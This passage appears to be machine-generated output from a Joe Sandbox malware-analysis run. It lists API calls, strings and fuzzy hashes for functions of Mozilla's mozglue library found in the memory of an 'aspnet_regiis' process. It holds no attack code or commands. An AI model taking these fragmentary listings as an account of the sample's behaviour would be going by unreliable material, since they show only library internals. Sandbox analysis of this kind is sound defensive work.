                                                                                                                            • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6CC3803D
                                                                                                                            • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6CC3808D
                                                                                                                              • Part of subcall function 6CC3CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC3CAA2
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6CC3809B
                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CC380B9
                                                                                                                            • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CC380DF
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC380ED
                                                                                                                            • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC380FB
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC3810D
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CC38133
                                                                                                                            • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6CC38149
                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6CC38167
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6CC3817C
                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC38199
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2721933968-0
                                                                                                                            • Opcode ID: f3c9f95b8a6a4baea6f1aae69a8a7ed6863d9e0ac23d0dbfd0db2049badebdfd
                                                                                                                            • Instruction ID: 7e671f1e5fcac0bf7f7d18574b1c96ad2aa7594f9a6da36bb8d398d3e824cf23
                                                                                                                            • Opcode Fuzzy Hash: f3c9f95b8a6a4baea6f1aae69a8a7ed6863d9e0ac23d0dbfd0db2049badebdfd
                                                                                                                            • Instruction Fuzzy Hash: 105173B2E002149BDB00DBA9EC84EEFB7B9AF49264F145126E819E7741F7349905CBA1
                                                                                                                            APIs
                                                                                                                            • InitializeCriticalSection.KERNEL32(6CCAF618), ref: 6CC86694
                                                                                                                            • GetThreadId.KERNEL32(?), ref: 6CC866B1
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC866B9
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000100), ref: 6CC866E1
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAF618), ref: 6CC86734
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC8673A
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAF618), ref: 6CC8676C
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 6CC867FC
                                                                                                                            • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6CC86868
                                                                                                                            • RtlCaptureContext.NTDLL ref: 6CC8687F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                            • String ID: WalkStack64
                                                                                                                            • API String ID: 2357170935-3499369396
                                                                                                                            • Opcode ID: 94824027caebc08d5510dad19be1ed778270aa18636fe2e79babefe14af3c4e4
                                                                                                                            • Instruction ID: 6d0bc6c9aa53f341c23b003dcaf61f20a79b92fbe471a52bf9cb84483440d816
                                                                                                                            • Opcode Fuzzy Hash: 94824027caebc08d5510dad19be1ed778270aa18636fe2e79babefe14af3c4e4
                                                                                                                            • Instruction Fuzzy Hash: 6E51BC71A1A701AFDB11CF64D848B5FBBF4BF89718F00492DF99987640E770E9048B92
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6DE73
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6DF7D
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6DF8A
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6DFC9
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6DFF7
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6E000
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CC34A68), ref: 6CC6DE7B
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                              • Part of subcall function 6CC5CBE8: GetCurrentProcess.KERNEL32(?,6CC231A7), ref: 6CC5CBF1
                                                                                                                              • Part of subcall function 6CC5CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC231A7), ref: 6CC5CBFA
                                                                                                                            • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CC34A68), ref: 6CC6DEB8
                                                                                                                            • free.MOZGLUE(00000000,?,6CC34A68), ref: 6CC6DEFE
                                                                                                                            • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC6DF38
                                                                                                                            Strings
                                                                                                                            • <none>, xrefs: 6CC6DFD7
                                                                                                                            • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6CC6E00E
                                                                                                                            • [I %d/%d] locked_profiler_stop, xrefs: 6CC6DE83
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                                            • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                            • API String ID: 1281939033-809102171
                                                                                                                            • Opcode ID: 77722f579110685922b8f2577fc901bf42be7ba9a907b9aaf894127d600285e1
                                                                                                                            • Instruction ID: 56063354a66e7d05f763dfcdb0141c677af1eb20ffe6101e78916953d7aa4945
                                                                                                                            • Opcode Fuzzy Hash: 77722f579110685922b8f2577fc901bf42be7ba9a907b9aaf894127d600285e1
                                                                                                                            • Instruction Fuzzy Hash: 63411535B012159FDB109FE6E99CBAE77B5EB4630CF244019E90997F01EB319806CBE6
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7D4F0
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC7D4FC
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC7D52A
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7D530
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC7D53F
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC7D55F
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC7D585
                                                                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC7D5D3
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7D5F9
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC7D605
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC7D652
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7D658
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC7D667
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC7D6A2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2206442479-0
                                                                                                                            • Opcode ID: ee75190491fcb02d71ebc5ba5f0efd3c7cb62dc959d6de42e0896814d0b90833
                                                                                                                            • Instruction ID: 3c87eb18506c8b9d17c32bd6b7c0b4c6c3026031cb877fbbc78f6ad094c731cb
                                                                                                                            • Opcode Fuzzy Hash: ee75190491fcb02d71ebc5ba5f0efd3c7cb62dc959d6de42e0896814d0b90833
                                                                                                                            • Instruction Fuzzy Hash: 07517DB1604709DFC704CF75D498A9ABBB4FF89318F008A2EE85A97710EB31E945CB91
                                                                                                                            APIs
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6CC456D1
                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC456E9
                                                                                                                            • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6CC456F1
                                                                                                                            • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6CC45744
                                                                                                                            • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6CC457BC
                                                                                                                            • GetTickCount64.KERNEL32 ref: 6CC458CB
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAF688), ref: 6CC458F3
                                                                                                                            • __aulldiv.LIBCMT ref: 6CC45945
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAF688), ref: 6CC459B2
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6CCAF638,?,?,?,?), ref: 6CC459E9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                            • String ID: MOZ_APP_RESTART
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6EC84
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6EC8C
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6ECA1
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6ECAE
                                                                                                                            • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CC6ECC5
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6ED0A
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC6ED19
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6CC6ED28
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC6ED2F
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6ED59
                                                                                                                            Strings
                                                                                                                            • [I %d/%d] profiler_ensure_started, xrefs: 6CC6EC94
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                            • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC2EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC2EB83
                                                                                                                            • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6CC6B392,?,?,00000001), ref: 6CC691F4
                                                                                                                              • Part of subcall function 6CC5CBE8: GetCurrentProcess.KERNEL32(?,6CC231A7), ref: 6CC5CBF1
                                                                                                                              • Part of subcall function 6CC5CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC231A7), ref: 6CC5CBFA
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                            • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                            APIs
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC4C5A3
                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 6CC4C9EA
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CC4C9FB
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CC4CA12
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC4CA2E
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC4CAA5
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                            • String ID: (null)$0
                                                                                                                            APIs
                                                                                                                            • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC4C784
                                                                                                                            • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC4C801
                                                                                                                            • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6CC4C83D
                                                                                                                            • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC4C891
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                                                            • String ID: INF$NAN$inf$nan
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC23492
                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC234A9
                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC234EF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CC2350E
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC23522
                                                                                                                            • __aulldiv.LIBCMT ref: 6CC23552
                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC2357C
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC23592
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                            • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                            APIs
                                                                                                                            Similarity
                                                                                                                            • API ID: free$moz_xmalloc
                                                                                                                            • String ID:
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1192971331-0
                                                                                                                            • Opcode ID: 52975e15bac8cc01ebd2107c160bdfbbd14bf06447058c1d5cbcad64e85213a9
                                                                                                                            • Instruction ID: 61ca9bb6bf810d48bb3faa233775f084d983d4a0a6f1238b79334797f5c1938a
                                                                                                                            • Opcode Fuzzy Hash: 52975e15bac8cc01ebd2107c160bdfbbd14bf06447058c1d5cbcad64e85213a9
                                                                                                                            • Instruction Fuzzy Hash: 443140B19057098FDB00AFB9D64C26EBFF0BF85305F01492DE98997251EB709458CB82
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CC39675
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC39697
                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CC396E8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CC39707
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3971F
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC39773
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CC397B7
                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CC397D0
                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CC397EB
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC39824
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                            • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                            • API String ID: 409848716-3880535382
                                                                                                                            • Opcode ID: 47bae0984198bb12941c74970ff70abfea4d5bd61e29291f54c5439cc4d07b6c
                                                                                                                            • Instruction ID: 3924f9e0da29a3cfd9b2596d3d21062158d4c042b913507dbb5f12caab17f718
                                                                                                                            • Opcode Fuzzy Hash: 47bae0984198bb12941c74970ff70abfea4d5bd61e29291f54c5439cc4d07b6c
                                                                                                                            • Instruction Fuzzy Hash: A1416DB5A002169FDF00CFE5F89CA9A77B4EB8A354F005529ED19D7780EB30A815CBA5
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE784), ref: 6CC21EC1
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784), ref: 6CC21EE1
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE744), ref: 6CC21F38
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE744), ref: 6CC21F5C
                                                                                                                            • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CC21F83
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784), ref: 6CC21FC0
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE784), ref: 6CC21FE2
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784), ref: 6CC21FF6
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC22019
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                                            • String ID: MOZ_CRASH()
                                                                                                                            • API String ID: 2055633661-2608361144
                                                                                                                            • Opcode ID: 13fcc0dce73deb3ddb998168d738852d2c5293234c9844b22a0ec4eb48760a07
                                                                                                                            • Instruction ID: d642a812c0f67afa96b358c93ec64a23a856cb5f1467a1516116dea3deb1c4f5
                                                                                                                            • Opcode Fuzzy Hash: 13fcc0dce73deb3ddb998168d738852d2c5293234c9844b22a0ec4eb48760a07
                                                                                                                            • Instruction Fuzzy Hash: E741CC71B0021A8BDB108FFCD89CBAE7AB5EF4A348F044029E915D7781EB7598158BD5
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 6CC86009
                                                                                                                            • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CC86024
                                                                                                                            • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6CC2EE51,?), ref: 6CC86046
                                                                                                                            • OutputDebugStringA.KERNEL32(?,6CC2EE51,?), ref: 6CC86061
                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC86069
                                                                                                                            • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC86073
                                                                                                                            • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC86082
                                                                                                                            • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6CCA148E), ref: 6CC86091
                                                                                                                            • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6CC2EE51,00000000,?), ref: 6CC860BA
                                                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC860C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
